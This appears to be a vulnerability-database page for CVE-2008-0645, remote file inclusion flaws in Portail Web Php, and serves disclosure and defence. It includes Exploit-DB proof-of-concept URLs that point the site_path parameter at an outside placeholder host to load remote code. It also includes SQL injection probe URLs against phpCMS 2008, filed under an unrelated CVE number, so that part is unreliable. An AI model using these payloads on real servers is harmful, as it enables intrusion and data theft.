CVE-2008-0645
Published 2008-02-07
Priority P3 · 50 · high · 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 34.27% (98.2th percentile)
Multiple PHP remote file inclusion vulnerabilities in Portail Web Php 2.5.1.1 allow remote attackers to execute arbitrary PHP code via a URL in the site_path parameter to (1) config/conf-activation.php, (2) menu/item.php, and (3) modules/conf_modules.php in admin/system/; and (4) system/login.php. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| portail_web_php | portail_web_php | <= 2.5.1.1 | — |
| portail_web_php | portail_web_php | — | — |
GHSA
GHSA-fwpq-7jcm-8q4c: Multiple PHP remote file inclusion vulnerabilities in Portail Web Php 2
ghsa_unreviewed·2022-05-01
CVE-2008-0645 [HIGH] CWE-94 GHSA-fwpq-7jcm-8q4c: Multiple PHP remote file inclusion vulnerabilities in Portail Web Php 2
GHSA
GHSA-w6pv-f5jc-pvqc: Multiple PHP remote file inclusion vulnerabilities in Portail Web Php 2
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2008-1068 [HIGH] CWE-94 GHSA-w6pv-f5jc-pvqc: Multiple PHP remote file inclusion vulnerabilities in Portail Web Php 2
Multiple PHP remote file inclusion vulnerabilities in Portail Web Php 2.5.1.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the site_path parameter to (1) Vert/index.php, (2) Noir/index.php, and (3) Bleu/index.php in template/, different vectors than CVE-2008-0645.
No detection rules found.
Exploit-DB
phpCMS 2008 - SQL Injection
exploitdb·2011-01-20
CVE-2011-0645 phpCMS 2008 - SQL Injection
---
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Merciful}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[~] Type: REMOTE SQL iNJECTioN
[~] Vendor: www.phpcms.cn
[+] Software: Phpcms 2008 V2
[+] author: ((R3d-D3v!L))
[~]
[+] TEAM: Xp10_hACKEr & 403-T3AM
[~]
[?] contact: X[at]hotmail.co.jp
[-]
[?] Date: 17.jan.2011
[?] T!ME: 05:15 am GMT
[?] Home: WwW.XP10.COM
[^] Xp10_hAcKEr
[?]
# REMOTE SQL iNJECTioN Vulnerabilities
[*] Err0r C0N50L3:
http://server/bbs/phpcms_th/flash_upload.php?modelid= EV!L INJECT!ON
[*] proof of concept =
http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+20-- (false)
http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+19-- (TruE)
Already Tested on Win Xp
[~]-----------------------
Exploit-DB
phpCMS 2008 V2 - 'data.php' SQL Injection
exploitdb·2011-01-17
CVE-2011-0645 phpCMS 2008 V2 - 'data.php' SQL Injection
---
source: https://www.securityfocus.com/bid/45913/info
PHPCMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
PHPCMS 2008 V2 is vulnerable; other versions may also be affected.
http://www.example.com/path/data.php?action=get&where_time=-1+union+all+select+1,database()--
Exploit-DB
Portail Web PHP 2.5.1 - 'conf_modules.php' Remote File Inclusion
exploitdb·2008-02-04
CVE-2008-0645 Portail Web PHP 2.5.1 - 'conf_modules.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/27616/info
Portail Web Php is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Portail Web Php 2.5.1.1; other versions may also be affected.
http://www.example.com/path/admin/system/modules/conf_modules.php?site_path=http://www.example2.com
Exploit-DB
Portail Web PHP 2.5.1 - 'conf-activation.php' Remote File Inclusion
exploitdb·2008-02-04
CVE-2008-0645 Portail Web PHP 2.5.1 - 'conf-activation.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/27616/info
Portail Web Php is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Portail Web Php 2.5.1.1; other versions may also be affected.
http://www.example.com/path/admin/system/config/conf-activation.php?site_path=http://www.example2.com
Exploit-DB
Portail Web PHP 2.5.1 - 'login.php' Remote File Inclusion
exploitdb·2008-02-04
CVE-2008-0645 Portail Web PHP 2.5.1 - 'login.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/27616/info
Portail Web Php is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Portail Web Php 2.5.1.1; other versions may also be affected.
http://www.example.com/path/system/login.php?site_path=http://www.example2.com
Exploit-DB
Portail Web PHP 2.5.1 - 'item.php' Remote File Inclusion
exploitdb·2008-02-04
CVE-2008-0645 Portail Web PHP 2.5.1 - 'item.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/27616/info
Portail Web Php is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Portail Web Php 2.5.1.1; other versions may also be affected.
http://www.example.com/path/admin/system/menu/item.php?site_path=http://www.example2.com
No writeups or analysis indexed.
Published: 2008-02-07